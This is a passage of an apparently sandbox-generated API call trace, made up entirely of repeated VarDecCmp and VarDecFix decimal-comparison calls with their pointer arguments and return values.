(pdecLeft=0x1b62c6d8, pdecRight=0x1b62c6c8) returned 0x1 [0333.538] VarDecCmp (pdecLeft=0x1b62c8a8, pdecRight=0x1b62c898) returned 0x0 [0333.538] VarDecCmp (pdecLeft=0x1b62c768, pdecRight=0x1b62c758) returned 0x2 [0333.538] VarDecCmp (pdecLeft=0x1b62c648, pdecRight=0x1b62c638) returned 0x2 [0333.538] VarDecFix (in: pdecIn=0x1b62c628, pdecResult=0x1b62c5b0 | out: pdecResult=0x1b62c5b0) returned 0x0 [0333.538] VarDecCmp (pdecLeft=0x1b62c618, pdecRight=0x1b62c608) returned 0x1 [0333.538] VarDecCmp (pdecLeft=0x1b62c640, pdecRight=0x1b62c630) returned 0x2 [0333.538] VarDecFix (in: pdecIn=0x1b62c620, pdecResult=0x1b62c590 | out: pdecResult=0x1b62c590) returned 0x0 [0333.538] VarDecCmp (pdecLeft=0x1b62c610, pdecRight=0x1b62c600) returned 0x1 [0333.538] VarDecCmp (pdecLeft=0x1b62c5f0, pdecRight=0x1b62c5e0) returned 0x2 [0333.538] VarDecCmp (pdecLeft=0x1b62c628, pdecRight=0x1b62c618) returned 0x2 [0333.538] VarDecCmp (pdecLeft=0x1b62c738, pdecRight=0x1b62c728) returned 0x0 [0333.538] VarDecCmp (pdecLeft=0x1b62c6f8, pdecRight=0x1b62c6e8) returned 0x1 [0333.538] VarDecCmp (pdecLeft=0x1b62c6d8, pdecRight=0x1b62c6c8) returned 0x1 [0333.538] VarDecCmp (pdecLeft=0x1b62c8a8, pdecRight=0x1b62c898) returned 0x0 [0333.538] VarDecCmp (pdecLeft=0x1b62c958, pdecRight=0x1b62c948) returned 0x2 [0333.538] VarDecCmp (pdecLeft=0x1b62c618, pdecRight=0x1b62c608) returned 0x0 [0333.538] VarDecCmp (pdecLeft=0x1b62c5d8, pdecRight=0x1b62c5c8) returned 0x1 [0333.538] VarDecCmp (pdecLeft=0x1b62c5b8, pdecRight=0x1b62c5a8) returned 0x1 [0333.538] VarDecCmp (pdecLeft=0x1b62c618, pdecRight=0x1b62c608) returned 0x0 [0333.538] VarDecCmp (pdecLeft=0x1b62c5d8, pdecRight=0x1b62c5c8) returned 0x1 [0333.539] VarDecCmp (pdecLeft=0x1b62c5b8, pdecRight=0x1b62c5a8) returned 0x1 [0333.539] VarDecCmp (pdecLeft=0x1b62c868, pdecRight=0x1b62c858) returned 0x1 [0333.539] VarDecCmp (pdecLeft=0x1b62c848, pdecRight=0x1b62c838) returned 0x1 [0333.539] VarDecCmp (pdecLeft=0x1b62c948, pdecRight=0x1b62c938) returned 0x2 [0333.539] VarDecCmp (pdecLeft=0x1b62c828, pdecRight=0x1b62c818) returned 0x2 [0333.539] VarDecFix (in: pdecIn=0x1b62c808, pdecResult=0x1b62c790 | out: pdecResult=0x1b62c790) returned 0x0 [0333.539] VarDecCmp (pdecLeft=0x1b62c7f8, pdecRight=0x1b62c7e8) returned 0x1 [0333.539] VarDecCmp (pdecLeft=0x1b62c820, pdecRight=0x1b62c810) returned 0x2 [0333.539] VarDecFix (in: pdecIn=0x1b62c800, pdecResult=0x1b62c770 | out: pdecResult=0x1b62c770) returned 0x0 [0333.539] VarDecCmp (pdecLeft=0x1b62c7f0, pdecRight=0x1b62c7e0) returned 0x1 [0333.539] VarDecCmp (pdecLeft=0x1b62c7d0, pdecRight=0x1b62c7c0) returned 0x2 [0333.539] VarDecCmp (pdecLeft=0x1b62c808, pdecRight=0x1b62c7f8) returned 0x2 [0333.539] VarDecCmp (pdecLeft=0x1b62c918, pdecRight=0x1b62c908) returned 0x0 [0333.539] VarDecCmp (pdecLeft=0x1b62c8d8, pdecRight=0x1b62c8c8) returned 0x2 [0333.539] VarDecCmp (pdecLeft=0x1b62c7b8, pdecRight=0x1b62c7a8) returned 0x2 [0333.539] VarDecFix (in: pdecIn=0x1b62c798, pdecResult=0x1b62c720 | out: pdecResult=0x1b62c720) returned 0x0 [0333.539] VarDecCmp (pdecLeft=0x1b62c788, pdecRight=0x1b62c778) returned 0x1 [0333.539] VarDecCmp (pdecLeft=0x1b62c7b0, pdecRight=0x1b62c7a0) returned 0x2 [0333.539] VarDecFix (in: pdecIn=0x1b62c790, pdecResult=0x1b62c700 | out: pdecResult=0x1b62c700) returned 0x0 [0333.539] VarDecCmp (pdecLeft=0x1b62c780, pdecRight=0x1b62c770) returned 0x1 [0333.539] VarDecCmp (pdecLeft=0x1b62c760, pdecRight=0x1b62c750) returned 0x2 [0333.539] VarDecCmp (pdecLeft=0x1b62c768, pdecRight=0x1b62c758) returned 0x2 [0333.539] VarDecCmp (pdecLeft=0x1b62c648, pdecRight=0x1b62c638) returned 0x2 [0333.539] VarDecFix (in: pdecIn=0x1b62c628, pdecResult=0x1b62c5b0 | out: pdecResult=0x1b62c5b0) returned 0x0 [0333.539] VarDecCmp (pdecLeft=0x1b62c618, pdecRight=0x1b62c608) returned 0x1 [0333.539] VarDecCmp (pdecLeft=0x1b62c640, pdecRight=0x1b62c630) returned 0x2 [0333.540] VarDecFix (in: pdecIn=0x1b62c620, pdecResult=0x1b62c590 | out: pdecResult=0x1b62c590) returned 0x0 [0333.540] VarDecCmp (pdecLeft=0x1b62c610, pdecRight=0x1b62c600) returned 0x1 [0333.540] VarDecCmp (pdecLeft=0x1b62c5f0, pdecRight=0x1b62c5e0) returned 0x2 [0333.540] VarDecCmp (pdecLeft=0x1b62c628, pdecRight=0x1b62c618) returned 0x2 [0333.540] VarDecCmp (pdecLeft=0x1b62c738, pdecRight=0x1b62c728) returned 0x0 [0333.540] VarDecCmp (pdecLeft=0x1b62c6f8, pdecRight=0x1b62c6e8) returned 0x1 [0333.540] VarDecCmp (pdecLeft=0x1b62c6d8, pdecRight=0x1b62c6c8) returned 0x1 [0333.540] VarDecCmp (pdecLeft=0x1b62c8a8, pdecRight=0x1b62c898) returned 0x0 [0333.540] VarDecCmp (pdecLeft=0x1b62c768, pdecRight=0x1b62c758) returned 0x2 [0333.540] VarDecCmp (pdecLeft=0x1b62c648, pdecRight=0x1b62c638) returned 0x2 [0333.540] VarDecFix (in: pdecIn=0x1b62c628, pdecResult=0x1b62c5b0 | out: pdecResult=0x1b62c5b0) returned 0x0 [0333.540] VarDecCmp (pdecLeft=0x1b62c618, pdecRight=0x1b62c608) returned 0x1 [0333.540] VarDecCmp (pdecLeft=0x1b62c640, pdecRight=0x1b62c630) returned 0x2 [0333.540] VarDecFix (in: pdecIn=0x1b62c620, pdecResult=0x1b62c590 | out: pdecResult=0x1b62c590) returned 0x0 [0333.540] VarDecCmp (pdecLeft=0x1b62c610, pdecRight=0x1b62c600) returned 0x1 [0333.540] VarDecCmp (pdecLeft=0x1b62c5f0, pdecRight=0x1b62c5e0) returned 0x2 [0333.540] VarDecCmp (pdecLeft=0x1b62c628, pdecRight=0x1b62c618) returned 0x2 [0333.540] VarDecCmp (pdecLeft=0x1b62c738, pdecRight=0x1b62c728) returned 0x0 [0333.540] VarDecCmp (pdecLeft=0x1b62c6f8, pdecRight=0x1b62c6e8) returned 0x1 [0333.540] VarDecCmp (pdecLeft=0x1b62c6d8, pdecRight=0x1b62c6c8) returned 0x1 [0333.540] VarDecCmp (pdecLeft=0x1b62c8a8, pdecRight=0x1b62c898) returned 0x0 [0333.540] VarDecCmp (pdecLeft=0x1b62c958, pdecRight=0x1b62c948) returned 0x2 [0333.540] VarDecCmp (pdecLeft=0x1b62c618, pdecRight=0x1b62c608) returned 0x0 [0333.540] VarDecCmp (pdecLeft=0x1b62c5d8, pdecRight=0x1b62c5c8) returned 0x1 [0333.540] VarDecCmp (pdecLeft=0x1b62c5b8, pdecRight=0x1b62c5a8) returned 0x1 [0333.540] VarDecCmp (pdecLeft=0x1b62c618, pdecRight=0x1b62c608) returned 0x0 [0333.540] VarDecCmp (pdecLeft=0x1b62c5d8, pdecRight=0x1b62c5c8) returned 0x1 [0333.540] VarDecCmp (pdecLeft=0x1b62c5b8, pdecRight=0x1b62c5a8) returned 0x1 [0333.540] VarDecCmp (pdecLeft=0x1b62c868, pdecRight=0x1b62c858) returned 0x1 [0333.540] VarDecCmp (pdecLeft=0x1b62c848, pdecRight=0x1b62c838) returned 0x1 [0333.541] VarDecCmp (pdecLeft=0x1b62c818, pdecRight=0x1b62c808) returned 0x2 [0333.541] VarDecCmp (pdecLeft=0x1b62c6f8, pdecRight=0x1b62c6e8) returned 0x2 [0333.541] VarDecFix (in: pdecIn=0x1b62c6d8, pdecResult=0x1b62c660 | out: pdecResult=0x1b62c660) returned 0x0 [0333.541] VarDecCmp (pdecLeft=0x1b62c6c8, pdecRight=0x1b62c6b8) returned 0x1 [0333.541] VarDecCmp (pdecLeft=0x1b62c6f0, pdecRight=0x1b62c6e0) returned 0x2 [0333.541] VarDecFix (in: pdecIn=0x1b62c6d0, pdecResult=0x1b62c640 | out: pdecResult=0x1b62c640) returned 0x0 [0333.541] VarDecCmp (pdecLeft=0x1b62c6c0, pdecRight=0x1b62c6b0) returned 0x1 [0333.541] VarDecCmp (pdecLeft=0x1b62c6a0, pdecRight=0x1b62c690) returned 0x2 [0333.541] VarDecCmp (pdecLeft=0x1b62c6d8, pdecRight=0x1b62c6c8) returned 0x2 [0333.541] VarDecCmp (pdecLeft=0x1b62c7e8, pdecRight=0x1b62c7d8) returned 0x1 [0333.541] VarDecCmp (pdecLeft=0x1b62c7c8, pdecRight=0x1b62c7b8) returned 0x1 [0333.541] VarDecCmp (pdecLeft=0x1b62c898, pdecRight=0x1b62c888) returned 0x2 [0333.541] VarDecCmp (pdecLeft=0x1b62c4b8, pdecRight=0x1b62c4a8) returned 0x1 [0333.541] VarDecCmp (pdecLeft=0x1b62c498, pdecRight=0x1b62c488) returned 0x1 [0333.541] VarDecCmp (pdecLeft=0x1b62c708, pdecRight=0x1b62c6f8) returned 0x1 [0333.541] VarDecCmp (pdecLeft=0x1b62c6e8, pdecRight=0x1b62c6d8) returned 0x1 [0333.541] VarDecCmp (pdecLeft=0x1b62c948, pdecRight=0x1b62c938) returned 0x2 [0333.541] VarDecCmp (pdecLeft=0x1b62c828, pdecRight=0x1b62c818) returned 0x2 [0333.541] VarDecFix (in: pdecIn=0x1b62c808, pdecResult=0x1b62c790 | out: pdecResult=0x1b62c790) returned 0x0 [0333.541] VarDecCmp (pdecLeft=0x1b62c7f8, pdecRight=0x1b62c7e8) returned 0x1 [0333.541] VarDecCmp (pdecLeft=0x1b62c820, pdecRight=0x1b62c810) returned 0x2 [0333.541] VarDecFix (in: pdecIn=0x1b62c800, pdecResult=0x1b62c770 | out: pdecResult=0x1b62c770) returned 0x0 [0333.541] VarDecCmp (pdecLeft=0x1b62c7f0, pdecRight=0x1b62c7e0) returned 0x1 [0333.541] VarDecCmp (pdecLeft=0x1b62c7d0, pdecRight=0x1b62c7c0) returned 0x2 [0333.541] VarDecCmp (pdecLeft=0x1b62c808, pdecRight=0x1b62c7f8) returned 0x2 [0333.541] VarDecCmp (pdecLeft=0x1b62c918, pdecRight=0x1b62c908) returned 0x0 [0333.541] VarDecCmp (pdecLeft=0x1b62c808, pdecRight=0x1b62c7f8) returned 0x2 [0333.541] VarDecCmp (pdecLeft=0x1b62c918, pdecRight=0x1b62c908) returned 0x0 [0333.542] VarDecCmp (pdecLeft=0x1b62c8d8, pdecRight=0x1b62c8c8) returned 0x2 [0333.542] VarDecCmp (pdecLeft=0x1b62c7b8, pdecRight=0x1b62c7a8) returned 0x2 [0333.542] VarDecFix (in: pdecIn=0x1b62c798, pdecResult=0x1b62c720 | out: pdecResult=0x1b62c720) returned 0x0 [0333.542] VarDecCmp (pdecLeft=0x1b62c788, pdecRight=0x1b62c778) returned 0x1 [0333.542] VarDecCmp (pdecLeft=0x1b62c7b0, pdecRight=0x1b62c7a0) returned 0x2 [0333.542] VarDecFix (in: pdecIn=0x1b62c790, pdecResult=0x1b62c700 | out: pdecResult=0x1b62c700) returned 0x0 [0333.542] VarDecCmp (pdecLeft=0x1b62c780, pdecRight=0x1b62c770) returned 0x1 [0333.542] VarDecCmp (pdecLeft=0x1b62c760, pdecRight=0x1b62c750) returned 0x2 [0333.542] VarDecCmp (pdecLeft=0x1b62c768, pdecRight=0x1b62c758) returned 0x2 [0333.542] VarDecCmp (pdecLeft=0x1b62c648, pdecRight=0x1b62c638) returned 0x2 [0333.542] VarDecFix (in: pdecIn=0x1b62c628, pdecResult=0x1b62c5b0 | out: pdecResult=0x1b62c5b0) returned 0x0 [0333.542] VarDecCmp (pdecLeft=0x1b62c618, pdecRight=0x1b62c608) returned 0x1 [0333.542] VarDecCmp (pdecLeft=0x1b62c640, pdecRight=0x1b62c630) returned 0x2 [0333.542] VarDecFix (in: pdecIn=0x1b62c620, pdecResult=0x1b62c590 | out: pdecResult=0x1b62c590) returned 0x0 [0333.542] VarDecCmp (pdecLeft=0x1b62c610, pdecRight=0x1b62c600) returned 0x1 [0333.542] VarDecCmp (pdecLeft=0x1b62c5f0, pdecRight=0x1b62c5e0) returned 0x2 [0333.542] VarDecCmp (pdecLeft=0x1b62c628, pdecRight=0x1b62c618) returned 0x2 [0333.542] VarDecCmp (pdecLeft=0x1b62c738, pdecRight=0x1b62c728) returned 0x1 [0333.542] VarDecCmp (pdecLeft=0x1b62c718, pdecRight=0x1b62c708) returned 0x1 [0333.542] VarDecCmp (pdecLeft=0x1b62c6f8, pdecRight=0x1b62c6e8) returned 0x1 [0333.542] VarDecCmp (pdecLeft=0x1b62c6d8, pdecRight=0x1b62c6c8) returned 0x1 [0333.542] VarDecCmp (pdecLeft=0x1b62c8a8, pdecRight=0x1b62c898) returned 0x1 [0333.542] VarDecCmp (pdecLeft=0x1b62c888, pdecRight=0x1b62c878) returned 0x1 [0333.542] VarDecCmp (pdecLeft=0x1b62c768, pdecRight=0x1b62c758) returned 0x2 [0333.542] VarDecCmp (pdecLeft=0x1b62c648, pdecRight=0x1b62c638) returned 0x2 [0333.542] VarDecFix (in: pdecIn=0x1b62c628, pdecResult=0x1b62c5b0 | out: pdecResult=0x1b62c5b0) returned 0x0 [0333.542] VarDecCmp (pdecLeft=0x1b62c618, pdecRight=0x1b62c608) returned 0x1 [0333.542] VarDecCmp (pdecLeft=0x1b62c640, pdecRight=0x1b62c630) returned 0x2 [0333.542] VarDecFix (in: pdecIn=0x1b62c620, pdecResult=0x1b62c590 | out: pdecResult=0x1b62c590) returned 0x0 [0333.542] VarDecCmp (pdecLeft=0x1b62c610, pdecRight=0x1b62c600) returned 0x1 [0333.542] VarDecCmp (pdecLeft=0x1b62c5f0, pdecRight=0x1b62c5e0) returned 0x2 [0333.542] VarDecCmp (pdecLeft=0x1b62c628, pdecRight=0x1b62c618) returned 0x2 [0333.542] VarDecCmp (pdecLeft=0x1b62c738, pdecRight=0x1b62c728) returned 0x0 [0333.542] VarDecCmp (pdecLeft=0x1b62c628, pdecRight=0x1b62c618) returned 0x2 [0333.542] VarDecCmp (pdecLeft=0x1b62c738, pdecRight=0x1b62c728) returned 0x0 [0333.542] VarDecCmp (pdecLeft=0x1b62c8a8, pdecRight=0x1b62c898) returned 0x1 [0333.542] VarDecCmp (pdecLeft=0x1b62c888, pdecRight=0x1b62c878) returned 0x1 [0333.542] VarDecCmp (pdecLeft=0x1b62c958, pdecRight=0x1b62c948) returned 0x2 [0333.543] VarDecCmp (pdecLeft=0x1b62c618, pdecRight=0x1b62c608) returned 0x1 [0333.543] VarDecCmp (pdecLeft=0x1b62c5f8, pdecRight=0x1b62c5e8) returned 0x1 [0333.543] VarDecCmp (pdecLeft=0x1b62c618, pdecRight=0x1b62c608) returned 0x0 [0333.543] VarDecCmp (pdecLeft=0x1b62c5d8, pdecRight=0x1b62c5c8) returned 0x1 [0333.543] VarDecCmp (pdecLeft=0x1b62c5b8, pdecRight=0x1b62c5a8) returned 0x1 [0333.543] VarDecCmp (pdecLeft=0x1b62c618, pdecRight=0x1b62c608) returned 0x0 [0333.543] VarDecCmp (pdecLeft=0x1b62c5d8, pdecRight=0x1b62c5c8) returned 0x1 [0333.543] VarDecCmp (pdecLeft=0x1b62c5b8, pdecRight=0x1b62c5a8) returned 0x1 [0333.543] VarDecCmp (pdecLeft=0x1b62c868, pdecRight=0x1b62c858) returned 0x1 [0333.543] VarDecCmp (pdecLeft=0x1b62c848, pdecRight=0x1b62c838) returned 0x1 [0333.543] VarDecCmp (pdecLeft=0x1b62c948, pdecRight=0x1b62c938) returned 0x2 [0333.543] VarDecCmp (pdecLeft=0x1b62c828, pdecRight=0x1b62c818) returned 0x2 [0333.543] VarDecFix (in: pdecIn=0x1b62c808, pdecResult=0x1b62c790 | out: pdecResult=0x1b62c790) returned 0x0 [0333.543] VarDecCmp (pdecLeft=0x1b62c7f8, pdecRight=0x1b62c7e8) returned 0x1 [0333.543] VarDecCmp (pdecLeft=0x1b62c820, pdecRight=0x1b62c810) returned 0x2 [0333.543] VarDecFix (in: pdecIn=0x1b62c800, pdecResult=0x1b62c770 | out: pdecResult=0x1b62c770) returned 0x0 [0333.543] VarDecCmp (pdecLeft=0x1b62c7f0, pdecRight=0x1b62c7e0) returned 0x1 [0333.543] VarDecCmp (pdecLeft=0x1b62c7d0, pdecRight=0x1b62c7c0) returned 0x2 [0333.543] VarDecCmp (pdecLeft=0x1b62c808, pdecRight=0x1b62c7f8) returned 0x2 [0333.543] VarDecCmp (pdecLeft=0x1b62c918, pdecRight=0x1b62c908) returned 0x0 [0333.543] VarDecCmp (pdecLeft=0x1b62c808, pdecRight=0x1b62c7f8) returned 0x2 [0333.543] VarDecCmp (pdecLeft=0x1b62c918, pdecRight=0x1b62c908) returned 0x0 [0333.543] VarDecCmp (pdecLeft=0x1b62c8d8, pdecRight=0x1b62c8c8) returned 0x2 [0333.543] VarDecCmp (pdecLeft=0x1b62c7b8, pdecRight=0x1b62c7a8) returned 0x2 [0333.543] VarDecFix (in: pdecIn=0x1b62c798, pdecResult=0x1b62c720 | out: pdecResult=0x1b62c720) returned 0x0 [0333.543] VarDecCmp (pdecLeft=0x1b62c788, pdecRight=0x1b62c778) returned 0x1 [0333.543] VarDecCmp (pdecLeft=0x1b62c7b0, pdecRight=0x1b62c7a0) returned 0x2 [0333.544] VarDecFix (in: pdecIn=0x1b62c790, pdecResult=0x1b62c700 | out: pdecResult=0x1b62c700) returned 0x0 [0333.544] VarDecCmp (pdecLeft=0x1b62c780, pdecRight=0x1b62c770) returned 0x1 [0333.544] VarDecCmp (pdecLeft=0x1b62c760, pdecRight=0x1b62c750) returned 0x2 [0333.544] VarDecCmp (pdecLeft=0x1b62c768, pdecRight=0x1b62c758) returned 0x2 [0333.544] VarDecCmp (pdecLeft=0x1b62c648, pdecRight=0x1b62c638) returned 0x2 [0333.544] VarDecFix (in: pdecIn=0x1b62c628, pdecResult=0x1b62c5b0 | out: pdecResult=0x1b62c5b0) returned 0x0 [0333.544] VarDecCmp (pdecLeft=0x1b62c618, pdecRight=0x1b62c608) returned 0x1 [0333.544] VarDecCmp (pdecLeft=0x1b62c640, pdecRight=0x1b62c630) returned 0x2 [0333.544] VarDecFix (in: pdecIn=0x1b62c620, pdecResult=0x1b62c590 | out: pdecResult=0x1b62c590) returned 0x0 [0333.544] VarDecCmp (pdecLeft=0x1b62c610, pdecRight=0x1b62c600) returned 0x1 [0333.544] VarDecCmp (pdecLeft=0x1b62c5f0, pdecRight=0x1b62c5e0) returned 0x2 [0333.544] VarDecCmp (pdecLeft=0x1b62c628, pdecRight=0x1b62c618) returned 0x2 [0333.544] VarDecCmp (pdecLeft=0x1b62c738, pdecRight=0x1b62c728) returned 0x1 [0333.544] VarDecCmp (pdecLeft=0x1b62c718, pdecRight=0x1b62c708) returned 0x1 [0333.544] VarDecCmp (pdecLeft=0x1b62c6f8, pdecRight=0x1b62c6e8) returned 0x1 [0333.544] VarDecCmp (pdecLeft=0x1b62c6d8, pdecRight=0x1b62c6c8) returned 0x1 [0333.544] VarDecCmp (pdecLeft=0x1b62c8a8, pdecRight=0x1b62c898) returned 0x1 [0333.544] VarDecCmp (pdecLeft=0x1b62c888, pdecRight=0x1b62c878) returned 0x1 [0333.544] VarDecCmp (pdecLeft=0x1b62c768, pdecRight=0x1b62c758) returned 0x2 [0333.544] VarDecCmp (pdecLeft=0x1b62c648, pdecRight=0x1b62c638) returned 0x2 [0333.544] VarDecFix (in: pdecIn=0x1b62c628, pdecResult=0x1b62c5b0 | out: pdecResult=0x1b62c5b0) returned 0x0 [0333.544] VarDecCmp (pdecLeft=0x1b62c618, pdecRight=0x1b62c608) returned 0x1 [0333.544] VarDecCmp (pdecLeft=0x1b62c640, pdecRight=0x1b62c630) returned 0x2 [0333.544] VarDecFix (in: pdecIn=0x1b62c620, pdecResult=0x1b62c590 | out: pdecResult=0x1b62c590) returned 0x0 [0333.544] VarDecCmp (pdecLeft=0x1b62c610, pdecRight=0x1b62c600) returned 0x1 [0333.544] VarDecCmp (pdecLeft=0x1b62c5f0, pdecRight=0x1b62c5e0) returned 0x2 [0333.544] VarDecCmp (pdecLeft=0x1b62c628, pdecRight=0x1b62c618) returned 0x2 [0333.544] VarDecCmp (pdecLeft=0x1b62c738, pdecRight=0x1b62c728) returned 0x0 [0333.544] VarDecCmp (pdecLeft=0x1b62c628, pdecRight=0x1b62c618) returned 0x2 [0333.544] VarDecCmp (pdecLeft=0x1b62c738, pdecRight=0x1b62c728) returned 0x0 [0333.544] VarDecCmp (pdecLeft=0x1b62c8a8, pdecRight=0x1b62c898) returned 0x1 [0333.544] VarDecCmp (pdecLeft=0x1b62c888, pdecRight=0x1b62c878) returned 0x1 [0333.544] VarDecCmp (pdecLeft=0x1b62c958, pdecRight=0x1b62c948) returned 0x2 [0333.544] VarDecCmp (pdecLeft=0x1b62c618, pdecRight=0x1b62c608) returned 0x1 [0333.544] VarDecCmp (pdecLeft=0x1b62c5f8, pdecRight=0x1b62c5e8) returned 0x1 [0333.544] VarDecCmp (pdecLeft=0x1b62c618, pdecRight=0x1b62c608) returned 0x0 [0333.544] VarDecCmp (pdecLeft=0x1b62c5d8, pdecRight=0x1b62c5c8) returned 0x1 [0333.544] VarDecCmp (pdecLeft=0x1b62c5b8, pdecRight=0x1b62c5a8) returned 0x1 [0333.544] VarDecCmp (pdecLeft=0x1b62c618, pdecRight=0x1b62c608) returned 0x0 [0333.545] VarDecCmp (pdecLeft=0x1b62c5d8, pdecRight=0x1b62c5c8) returned 0x1 [0333.545] VarDecCmp (pdecLeft=0x1b62c5b8, pdecRight=0x1b62c5a8) returned 0x1 [0333.545] VarDecCmp (pdecLeft=0x1b62c868, pdecRight=0x1b62c858) returned 0x1 [0333.545] VarDecCmp (pdecLeft=0x1b62c848, pdecRight=0x1b62c838) returned 0x1 [0333.546] VarDecCmp (pdecLeft=0x1b62c978, pdecRight=0x1b62c968) returned 0x2 [0333.546] VarDecCmp (pdecLeft=0x1b62c858, pdecRight=0x1b62c848) returned 0x2 [0333.546] VarDecFix (in: pdecIn=0x1b62c838, pdecResult=0x1b62c7c0 | out: pdecResult=0x1b62c7c0) returned 0x0 [0333.546] VarDecCmp (pdecLeft=0x1b62c828, pdecRight=0x1b62c818) returned 0x1 [0333.546] VarDecCmp (pdecLeft=0x1b62c850, pdecRight=0x1b62c840) returned 0x2 [0333.546] VarDecFix (in: pdecIn=0x1b62c830, pdecResult=0x1b62c7a0 | out: pdecResult=0x1b62c7a0) returned 0x0 [0333.546] VarDecCmp (pdecLeft=0x1b62c820, pdecRight=0x1b62c810) returned 0x1 [0333.546] VarDecCmp (pdecLeft=0x1b62c800, pdecRight=0x1b62c7f0) returned 0x2 [0333.546] VarDecCmp (pdecLeft=0x1b62c838, pdecRight=0x1b62c828) returned 0x2 [0333.546] VarDecCmp (pdecLeft=0x1b62c948, pdecRight=0x1b62c938) returned 0x0 [0333.546] VarDecCmp (pdecLeft=0x1b62c838, pdecRight=0x1b62c828) returned 0x2 [0333.546] VarDecCmp (pdecLeft=0x1b62c948, pdecRight=0x1b62c938) returned 0x0 [0333.546] VarDecCmp (pdecLeft=0x1b62c838, pdecRight=0x1b62c828) returned 0x2 [0333.546] VarDecCmp (pdecLeft=0x1b62c948, pdecRight=0x1b62c938) returned 0x0 [0333.546] VarDecCmp (pdecLeft=0x1b62c9f8, pdecRight=0x1b62c9e8) returned 0x2 [0333.546] VarDecCmp (pdecLeft=0x1b62c618, pdecRight=0x1b62c608) returned 0x0 [0333.546] VarDecCmp (pdecLeft=0x1b62c5d8, pdecRight=0x1b62c5c8) returned 0x1 [0333.546] VarDecCmp (pdecLeft=0x1b62c5b8, pdecRight=0x1b62c5a8) returned 0x1 [0333.546] VarDecCmp (pdecLeft=0x1b62c618, pdecRight=0x1b62c608) returned 0x0 [0333.546] VarDecCmp (pdecLeft=0x1b62c5d8, pdecRight=0x1b62c5c8) returned 0x1 [0333.546] VarDecCmp (pdecLeft=0x1b62c5b8, pdecRight=0x1b62c5a8) returned 0x1 [0333.546] VarDecCmp (pdecLeft=0x1b62c618, pdecRight=0x1b62c608) returned 0x0 [0333.546] VarDecCmp (pdecLeft=0x1b62c5d8, pdecRight=0x1b62c5c8) returned 0x1 [0333.546] VarDecCmp (pdecLeft=0x1b62c5b8, pdecRight=0x1b62c5a8) returned 0x1 [0333.546] VarDecCmp (pdecLeft=0x1b62c868, pdecRight=0x1b62c858) returned 0x1 [0333.546] VarDecCmp (pdecLeft=0x1b62c848, pdecRight=0x1b62c838) returned 0x1 [0333.547] VarDecCmp (pdecLeft=0x1b62c978, pdecRight=0x1b62c968) returned 0x2 [0333.547] VarDecCmp (pdecLeft=0x1b62c858, pdecRight=0x1b62c848) returned 0x2 [0333.547] VarDecFix (in: pdecIn=0x1b62c838, pdecResult=0x1b62c7c0 | out: pdecResult=0x1b62c7c0) returned 0x0 [0333.547] VarDecCmp (pdecLeft=0x1b62c828, pdecRight=0x1b62c818) returned 0x1 [0333.547] VarDecCmp (pdecLeft=0x1b62c850, pdecRight=0x1b62c840) returned 0x2 [0333.547] VarDecFix (in: pdecIn=0x1b62c830, pdecResult=0x1b62c7a0 | out: pdecResult=0x1b62c7a0) returned 0x0 [0333.547] VarDecCmp (pdecLeft=0x1b62c820, pdecRight=0x1b62c810) returned 0x1 [0333.547] VarDecCmp (pdecLeft=0x1b62c800, pdecRight=0x1b62c7f0) returned 0x2 [0333.547] VarDecCmp (pdecLeft=0x1b62c838, pdecRight=0x1b62c828) returned 0x2 [0333.547] VarDecCmp (pdecLeft=0x1b62c948, pdecRight=0x1b62c938) returned 0x1 [0333.547] VarDecCmp (pdecLeft=0x1b62c928, pdecRight=0x1b62c918) returned 0x1 [0333.547] VarDecCmp (pdecLeft=0x1b62c838, pdecRight=0x1b62c828) returned 0x2 [0333.547] VarDecCmp (pdecLeft=0x1b62c948, pdecRight=0x1b62c938) returned 0x0 [0333.547] VarDecCmp (pdecLeft=0x1b62c9f8, pdecRight=0x1b62c9e8) returned 0x2 [0333.547] VarDecCmp (pdecLeft=0x1b62c618, pdecRight=0x1b62c608) returned 0x1 [0333.547] VarDecCmp (pdecLeft=0x1b62c5f8, pdecRight=0x1b62c5e8) returned 0x1 [0333.547] VarDecCmp (pdecLeft=0x1b62c618, pdecRight=0x1b62c608) returned 0x0 [0333.547] VarDecCmp (pdecLeft=0x1b62c5d8, pdecRight=0x1b62c5c8) returned 0x1 [0333.547] VarDecCmp (pdecLeft=0x1b62c5b8, pdecRight=0x1b62c5a8) returned 0x1 [0333.548] VarDecFix (in: pdecIn=0x1b62c838, pdecResult=0x1b62c7c0 | out: pdecResult=0x1b62c7c0) returned 0x0 [0333.548] VarDecFix (in: pdecIn=0x1b62c830, pdecResult=0x1b62c7a0 | out: pdecResult=0x1b62c7a0) returned 0x0 [0333.548] VarDecFix (in: pdecIn=0x1b62c838, pdecResult=0x1b62c7c0 | out: pdecResult=0x1b62c7c0) returned 0x0 [0333.548] VarDecFix (in: pdecIn=0x1b62c830, pdecResult=0x1b62c7a0 | out: pdecResult=0x1b62c7a0) returned 0x0 [0333.548] VarDecCmp (pdecLeft=0x1b62c6b8, pdecRight=0x1b62c6a8) returned 0x2 [0333.548] VarDecFix (in: pdecIn=0x1b62c698, pdecResult=0x1b62c620 | out: pdecResult=0x1b62c620) returned 0x0 [0333.548] VarDecCmp (pdecLeft=0x1b62c688, pdecRight=0x1b62c678) returned 0x1 [0333.548] VarDecCmp (pdecLeft=0x1b62c6b0, pdecRight=0x1b62c6a0) returned 0x2 [0333.548] VarDecFix (in: pdecIn=0x1b62c690, pdecResult=0x1b62c600 | out: pdecResult=0x1b62c600) returned 0x0 [0333.548] VarDecCmp (pdecLeft=0x1b62c680, pdecRight=0x1b62c670) returned 0x1 [0333.548] VarDecCmp (pdecLeft=0x1b62c660, pdecRight=0x1b62c650) returned 0x2 [0333.548] VarDecCmp (pdecLeft=0x1b62c698, pdecRight=0x1b62c688) returned 0x2 [0333.548] VarDecCmp (pdecLeft=0x1b62c7c8, pdecRight=0x1b62c7b8) returned 0x1 [0333.548] VarDecCmp (pdecLeft=0x1b62c7a8, pdecRight=0x1b62c798) returned 0x1 [0333.548] VarDecCmp (pdecLeft=0x1b62c698, pdecRight=0x1b62c688) returned 0x2 [0333.548] VarDecCmp (pdecLeft=0x1b62c7c8, pdecRight=0x1b62c7b8) returned 0x1 [0333.548] VarDecCmp (pdecLeft=0x1b62c7a8, pdecRight=0x1b62c798) returned 0x1 [0333.548] VarDecCmp (pdecLeft=0x1b62c698, pdecRight=0x1b62c688) returned 0x2 [0333.548] VarDecCmp (pdecLeft=0x1b62c7c8, pdecRight=0x1b62c7b8) returned 0x1 [0333.548] VarDecCmp (pdecLeft=0x1b62c7a8, pdecRight=0x1b62c798) returned 0x1 [0333.548] VarDecCmp (pdecLeft=0x1b62c698, pdecRight=0x1b62c688) returned 